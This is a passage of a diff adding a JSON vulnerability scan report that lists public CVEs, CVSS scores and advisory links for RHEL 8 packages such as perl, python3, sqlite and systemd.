"obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "PARTIAL", + "base_score": 7.5, + "confidentiality_impact": "PARTIAL", + "exploitability_score": 10, + "impact_score": 6.4, + "integrity_impact": "PARTIAL" + }, + "severity": "High", + "vector_string": "AV:N/AC:L/Au:N/C:P/I:P/A:P", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "NETWORK", + "availability_impact": "HIGH", + "base_score": 8.6, + "base_severity": "High", + "confidentiality_impact": "LOW", + "exploitability_score": 3.9, + "impact_score": 4.7, + "integrity_impact": "LOW", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H", + "version": "3.1" + }, + "id": "CVE-2020-10878" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": false, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 5, + "exploitability_score": 10, + "impact_score": 2.9 + }, + "cvss_v3": { + "base_score": 7.5, + "exploitability_score": 3.9, + "impact_score": 3.6 + }, + "id": "CVE-2020-12723" + } + ], + "package": "perl-libs-5.26.3-416.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "perl-libs", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "5.26.3-416.el8", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-12723", + "vendor_data": [], + "vuln": "CVE-2020-12723", + "extra": { + "description": "regcomp.c in Perl before 5.30.3 allows a buffer overflow via a crafted regular expression because of recursive S_study_chunk calls.", + "id": "CVE-2020-12723", + "link": "https://access.redhat.com/security/cve/CVE-2020-12723", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "PARTIAL", + "base_score": 5, + "confidentiality_impact": "NONE", + "exploitability_score": 10, + "impact_score": 2.9, + "integrity_impact": "NONE" + }, + "severity": "Medium", + "vector_string": "AV:N/AC:L/Au:N/C:N/I:N/A:P", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "NETWORK", + "availability_impact": "HIGH", + "base_score": 7.5, + "base_severity": "High", + "confidentiality_impact": "NONE", + "exploitability_score": 3.9, + "impact_score": 3.6, + "integrity_impact": "NONE", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "version": "3.1" + }, + "id": "CVE-2020-12723" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": false, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 6.4, + "exploitability_score": 10, + "impact_score": 4.9 + }, + "cvss_v3": { + "base_score": 8.2, + "exploitability_score": 3.9, + "impact_score": 4.2 + }, + "id": "CVE-2020-10543" + } + ], + "package": "perl-macros-5.26.3-416.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "perl-macros", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "5.26.3-416.el8", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-10543", + "vendor_data": [], + "vuln": "CVE-2020-10543", + "extra": { + "description": "Perl before 5.30.3 on 32-bit platforms allows a heap-based buffer overflow because nested regular expression quantifiers have an integer overflow.", + "id": "CVE-2020-10543", + "link": "https://access.redhat.com/security/cve/CVE-2020-10543", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "PARTIAL", + "base_score": 6.4, + "confidentiality_impact": "NONE", + "exploitability_score": 10, + "impact_score": 4.9, + "integrity_impact": "PARTIAL" + }, + "severity": "Medium", + "vector_string": "AV:N/AC:L/Au:N/C:N/I:P/A:P", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "NETWORK", + "availability_impact": "HIGH", + "base_score": 8.2, + "base_severity": "High", + "confidentiality_impact": "NONE", + "exploitability_score": 3.9, + "impact_score": 4.2, + "integrity_impact": "LOW", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", + "version": "3.1" + }, + "id": "CVE-2020-10543" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": false, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 7.5, + "exploitability_score": 10, + "impact_score": 6.4 + }, + "cvss_v3": { + "base_score": 8.6, + "exploitability_score": 3.9, + "impact_score": 4.7 + }, + "id": "CVE-2020-10878" + } + ], + "package": "perl-macros-5.26.3-416.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "perl-macros", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "5.26.3-416.el8", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-10878", + "vendor_data": [], + "vuln": "CVE-2020-10878", + "extra": { + "description": "Perl before 5.30.3 has an integer overflow related to mishandling of a \"PL_regkind[OP(n)] == NOTHING\" situation. A crafted regular expression could lead to malformed bytecode with a possibility of instruction injection.", + "id": "CVE-2020-10878", + "link": "https://access.redhat.com/security/cve/CVE-2020-10878", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "PARTIAL", + "base_score": 7.5, + "confidentiality_impact": "PARTIAL", + "exploitability_score": 10, + "impact_score": 6.4, + "integrity_impact": "PARTIAL" + }, + "severity": "High", + "vector_string": "AV:N/AC:L/Au:N/C:P/I:P/A:P", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "NETWORK", + "availability_impact": "HIGH", + "base_score": 8.6, + "base_severity": "High", + "confidentiality_impact": "LOW", + "exploitability_score": 3.9, + "impact_score": 4.7, + "integrity_impact": "LOW", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H", + "version": "3.1" + }, + "id": "CVE-2020-10878" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": false, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 5, + "exploitability_score": 10, + "impact_score": 2.9 + }, + "cvss_v3": { + "base_score": 7.5, + "exploitability_score": 3.9, + "impact_score": 3.6 + }, + "id": "CVE-2020-12723" + } + ], + "package": "perl-macros-5.26.3-416.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "perl-macros", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "5.26.3-416.el8", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-12723", + "vendor_data": [], + "vuln": "CVE-2020-12723", + "extra": { + "description": "regcomp.c in Perl before 5.30.3 allows a buffer overflow via a crafted regular expression because of recursive S_study_chunk calls.", + "id": "CVE-2020-12723", + "link": "https://access.redhat.com/security/cve/CVE-2020-12723", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "PARTIAL", + "base_score": 5, + "confidentiality_impact": "NONE", + "exploitability_score": 10, + "impact_score": 2.9, + "integrity_impact": "NONE" + }, + "severity": "Medium", + "vector_string": "AV:N/AC:L/Au:N/C:N/I:N/A:P", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "NETWORK", + "availability_impact": "HIGH", + "base_score": 7.5, + "base_severity": "High", + "confidentiality_impact": "NONE", + "exploitability_score": 3.9, + "impact_score": 3.6, + "integrity_impact": "NONE", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "version": "3.1" + }, + "id": "CVE-2020-12723" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 6.4, + "exploitability_score": 10, + "impact_score": 4.9 + }, + "cvss_v3": { + "base_score": 7.2, + "exploitability_score": 3.9, + "impact_score": 2.7 + }, + "id": "CVE-2020-26116" + } + ], + "package": "platform-python-3.6.8-31.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "platform-python", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "3.6.8-31.el8", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-26116", + "vendor_data": [], + "vuln": "CVE-2020-26116", + "extra": { + "description": "http.client in Python 3.x before 3.5.10, 3.6.x before 3.6.12, 3.7.x before 3.7.9, and 3.8.x before 3.8.5 allows CRLF injection if the attacker controls the HTTP request method, as demonstrated by inserting CR and LF control characters in the first argument of HTTPConnection.request.", + "id": "CVE-2020-26116", + "link": "https://access.redhat.com/security/cve/CVE-2020-26116", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "NONE", + "base_score": 6.4, + "confidentiality_impact": "PARTIAL", + "exploitability_score": 10, + "impact_score": 4.9, + "integrity_impact": "PARTIAL" + }, + "severity": "Medium", + "vector_string": "AV:N/AC:L/Au:N/C:P/I:P/A:N", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "NETWORK", + "availability_impact": "NONE", + "base_score": 7.2, + "base_severity": "High", + "confidentiality_impact": "LOW", + "exploitability_score": 3.9, + "impact_score": 2.7, + "integrity_impact": "LOW", + "privileges_required": "NONE", + "scope": "CHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", + "version": "3.1" + }, + "id": "CVE-2020-26116" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 7.5, + "exploitability_score": 10, + "impact_score": 6.4 + }, + "cvss_v3": { + "base_score": 9.8, + "exploitability_score": 3.9, + "impact_score": 5.9 + }, + "id": "CVE-2020-27619" + } + ], + "package": "platform-python-3.6.8-31.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "platform-python", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "3.6.8-31.el8", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-27619", + "vendor_data": [], + "vuln": "CVE-2020-27619", + "extra": { + "description": "In Python 3 through 3.9.0, the Lib/test/multibytecodec_support.py CJK codec tests call eval() on content retrieved via HTTP.", + "id": "CVE-2020-27619", + "link": "https://access.redhat.com/security/cve/CVE-2020-27619", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "PARTIAL", + "base_score": 7.5, + "confidentiality_impact": "PARTIAL", + "exploitability_score": 10, + "impact_score": 6.4, + "integrity_impact": "PARTIAL" + }, + "severity": "High", + "vector_string": "AV:N/AC:L/Au:N/C:P/I:P/A:P", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "NETWORK", + "availability_impact": "HIGH", + "base_score": 9.8, + "base_severity": "Critical", + "confidentiality_impact": "HIGH", + "exploitability_score": 3.9, + "impact_score": 5.9, + "integrity_impact": "HIGH", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "version": "3.1" + }, + "id": "CVE-2020-27619" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 6.4, + "exploitability_score": 10, + "impact_score": 4.9 + }, + "cvss_v3": { + "base_score": 7.2, + "exploitability_score": 3.9, + "impact_score": 2.7 + }, + "id": "CVE-2020-26116" + } + ], + "package": "python3-libs-3.6.8-31.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "python3-libs", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "3.6.8-31.el8", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-26116", + "vendor_data": [], + "vuln": "CVE-2020-26116", + "extra": { + "description": "http.client in Python 3.x before 3.5.10, 3.6.x before 3.6.12, 3.7.x before 3.7.9, and 3.8.x before 3.8.5 allows CRLF injection if the attacker controls the HTTP request method, as demonstrated by inserting CR and LF control characters in the first argument of HTTPConnection.request.", + "id": "CVE-2020-26116", + "link": "https://access.redhat.com/security/cve/CVE-2020-26116", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "NONE", + "base_score": 6.4, + "confidentiality_impact": "PARTIAL", + "exploitability_score": 10, + "impact_score": 4.9, + "integrity_impact": "PARTIAL" + }, + "severity": "Medium", + "vector_string": "AV:N/AC:L/Au:N/C:P/I:P/A:N", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "NETWORK", + "availability_impact": "NONE", + "base_score": 7.2, + "base_severity": "High", + "confidentiality_impact": "LOW", + "exploitability_score": 3.9, + "impact_score": 2.7, + "integrity_impact": "LOW", + "privileges_required": "NONE", + "scope": "CHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", + "version": "3.1" + }, + "id": "CVE-2020-26116" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 7.5, + "exploitability_score": 10, + "impact_score": 6.4 + }, + "cvss_v3": { + "base_score": 9.8, + "exploitability_score": 3.9, + "impact_score": 5.9 + }, + "id": "CVE-2020-27619" + } + ], + "package": "python3-libs-3.6.8-31.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "python3-libs", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "3.6.8-31.el8", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-27619", + "vendor_data": [], + "vuln": "CVE-2020-27619", + "extra": { + "description": "In Python 3 through 3.9.0, the Lib/test/multibytecodec_support.py CJK codec tests call eval() on content retrieved via HTTP.", + "id": "CVE-2020-27619", + "link": "https://access.redhat.com/security/cve/CVE-2020-27619", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "PARTIAL", + "base_score": 7.5, + "confidentiality_impact": "PARTIAL", + "exploitability_score": 10, + "impact_score": 6.4, + "integrity_impact": "PARTIAL" + }, + "severity": "High", + "vector_string": "AV:N/AC:L/Au:N/C:P/I:P/A:P", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "NETWORK", + "availability_impact": "HIGH", + "base_score": 9.8, + "base_severity": "Critical", + "confidentiality_impact": "HIGH", + "exploitability_score": 3.9, + "impact_score": 5.9, + "integrity_impact": "HIGH", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "version": "3.1" + }, + "id": "CVE-2020-27619" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 6.4, + "exploitability_score": 10, + "impact_score": 4.9 + }, + "cvss_v3": { + "base_score": 6.5, + "exploitability_score": 3.9, + "impact_score": 2.5 + }, + "id": "CVE-2020-24977" + } + ], + "package": "python3-libxml2-2.9.7-8.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "python3-libxml2", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "2.9.7-8.el8", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-24977", + "vendor_data": [], + "vuln": "CVE-2020-24977", + "extra": { + "description": "GNOME project libxml2 v2.9.10 has a global buffer over-read vulnerability in xmlEncodeEntitiesInternal at libxml2/entities.c. The issue has been fixed in commit 50f06b3e.", + "id": "CVE-2020-24977", + "link": "https://access.redhat.com/security/cve/CVE-2020-24977", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "PARTIAL", + "base_score": 6.4, + "confidentiality_impact": "PARTIAL", + "exploitability_score": 10, + "impact_score": 4.9, + "integrity_impact": "NONE" + }, + "severity": "Medium", + "vector_string": "AV:N/AC:L/Au:N/C:P/I:N/A:P", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "NETWORK", + "availability_impact": "LOW", + "base_score": 6.5, + "base_severity": "Medium", + "confidentiality_impact": "LOW", + "exploitability_score": 3.9, + "impact_score": 2.5, + "integrity_impact": "NONE", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", + "version": "3.1" + }, + "id": "CVE-2020-24977" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 2.1, + "exploitability_score": 3.9, + "impact_score": 2.9 + }, + "cvss_v3": { + "base_score": 5.5, + "exploitability_score": 1.8, + "impact_score": 3.6 + }, + "id": "CVE-2020-13434" + } + ], + "package": "sqlite-libs-3.26.0-11.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "sqlite-libs", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "3.26.0-11.el8", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-13434", + "vendor_data": [], + "vuln": "CVE-2020-13434", + "extra": { + "description": "SQLite through 3.32.0 has an integer overflow in sqlite3_str_vappendf in printf.c.", + "id": "CVE-2020-13434", + "link": "https://access.redhat.com/security/cve/CVE-2020-13434", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "LOCAL", + "authentication": "NONE", + "availability_impact": "PARTIAL", + "base_score": 2.1, + "confidentiality_impact": "NONE", + "exploitability_score": 3.9, + "impact_score": 2.9, + "integrity_impact": "NONE" + }, + "severity": "Low", + "vector_string": "AV:L/AC:L/Au:N/C:N/I:N/A:P", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "LOCAL", + "availability_impact": "HIGH", + "base_score": 5.5, + "base_severity": "Medium", + "confidentiality_impact": "NONE", + "exploitability_score": 1.8, + "impact_score": 3.6, + "integrity_impact": "NONE", + "privileges_required": "LOW", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "version": "3.1" + }, + "id": "CVE-2020-13434" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 2.1, + "exploitability_score": 3.9, + "impact_score": 2.9 + }, + "cvss_v3": { + "base_score": 5.5, + "exploitability_score": 1.8, + "impact_score": 3.6 + }, + "id": "CVE-2020-15358" + } + ], + "package": "sqlite-libs-3.26.0-11.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "sqlite-libs", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "3.26.0-11.el8", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-15358", + "vendor_data": [], + "vuln": "CVE-2020-15358", + "extra": { + "description": "In SQLite before 3.32.3, select.c mishandles query-flattener optimization, leading to a multiSelectOrderBy heap overflow because of misuse of transitive properties for constant propagation.", + "id": "CVE-2020-15358", + "link": "https://access.redhat.com/security/cve/CVE-2020-15358", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "LOCAL", + "authentication": "NONE", + "availability_impact": "PARTIAL", + "base_score": 2.1, + "confidentiality_impact": "NONE", + "exploitability_score": 3.9, + "impact_score": 2.9, + "integrity_impact": "NONE" + }, + "severity": "Low", + "vector_string": "AV:L/AC:L/Au:N/C:N/I:N/A:P", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "LOCAL", + "availability_impact": "HIGH", + "base_score": 5.5, + "base_severity": "Medium", + "confidentiality_impact": "NONE", + "exploitability_score": 1.8, + "impact_score": 3.6, + "integrity_impact": "NONE", + "privileges_required": "LOW", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "version": "3.1" + }, + "id": "CVE-2020-15358" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 6.2, + "exploitability_score": 1.9, + "impact_score": 10 + }, + "cvss_v3": { + "base_score": 6.7, + "exploitability_score": 0.8, + "impact_score": 5.9 + }, + "id": "CVE-2020-13776" + } + ], + "package": "systemd-239-41.el8_3.1", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "systemd", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "239-41.el8_3.1", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-13776", + "vendor_data": [], + "vuln": "CVE-2020-13776", + "extra": { + "description": "systemd through v245 mishandles numerical usernames such as ones composed of decimal digits or 0x followed by hex digits, as demonstrated by use of root privileges when privileges of the 0x0 user account were intended. NOTE: this issue exists because of an incomplete fix for CVE-2017-1000082.", + "id": "CVE-2020-13776", + "link": "https://access.redhat.com/security/cve/CVE-2020-13776", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": true + }, + "base_metrics": { + "access_complexity": "HIGH", + "access_vector": "LOCAL", + "authentication": "NONE", + "availability_impact": "COMPLETE", + "base_score": 6.2, + "confidentiality_impact": "COMPLETE", + "exploitability_score": 1.9, + "impact_score": 10, + "integrity_impact": "COMPLETE" + }, + "severity": "Medium", + "vector_string": "AV:L/AC:H/Au:N/C:C/I:C/A:C", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "HIGH", + "attack_vector": "LOCAL", + "availability_impact": "HIGH", + "base_score": 6.7, + "base_severity": "Medium", + "confidentiality_impact": "HIGH", + "exploitability_score": 0.8, + "impact_score": 5.9, + "integrity_impact": "HIGH", + "privileges_required": "LOW", + "scope": "UNCHANGED", + "user_interaction": "REQUIRED" + }, + "vector_string": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", + "version": "3.1" + }, + "id": "CVE-2020-13776" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 6.2, + "exploitability_score": 1.9, + "impact_score": 10 + }, + "cvss_v3": { + "base_score": 6.7, + "exploitability_score": 0.8, + "impact_score": 5.9 + }, + "id": "CVE-2020-13776" + } + ], + "package": "systemd-libs-239-41.el8_3.1", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "systemd-libs", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "239-41.el8_3.1", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-13776", + "vendor_data": [], + "vuln": "CVE-2020-13776", + "extra": { + "description": "systemd through v245 mishandles numerical usernames such as ones composed of decimal digits or 0x followed by hex digits, as demonstrated by use of root privileges when privileges of the 0x0 user account were intended. NOTE: this issue exists because of an incomplete fix for CVE-2017-1000082.", + "id": "CVE-2020-13776", + "link": "https://access.redhat.com/security/cve/CVE-2020-13776", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": true + }, + "base_metrics": { + "access_complexity": "HIGH", + "access_vector": "LOCAL", + "authentication": "NONE", + "availability_impact": "COMPLETE", + "base_score": 6.2, + "confidentiality_impact": "COMPLETE", + "exploitability_score": 1.9, + "impact_score": 10, + "integrity_impact": "COMPLETE" + }, + "severity": "Medium", + "vector_string": "AV:L/AC:H/Au:N/C:C/I:C/A:C", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "HIGH", + "attack_vector": "LOCAL", + "availability_impact": "HIGH", + "base_score": 6.7, + "base_severity": "Medium", + "confidentiality_impact": "HIGH", + "exploitability_score": 0.8, + "impact_score": 5.9, + "integrity_impact": "HIGH", + "privileges_required": "LOW", + "scope": "UNCHANGED", + "user_interaction": "REQUIRED" + }, + "vector_string": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", + "version": "3.1" + }, + "id": "CVE-2020-13776" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 6.2, + "exploitability_score": 1.9, + "impact_score": 10 + }, + "cvss_v3": { + "base_score": 6.7, + "exploitability_score": 0.8, + "impact_score": 5.9 + }, + "id": "CVE-2020-13776" + } + ], + "package": "systemd-pam-239-41.el8_3.1", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "systemd-pam", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "239-41.el8_3.1", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-13776", + "vendor_data": [], + "vuln": "CVE-2020-13776", + "extra": { + "description": "systemd through v245 mishandles numerical usernames such as ones composed of decimal digits or 0x followed by hex digits, as demonstrated by use of 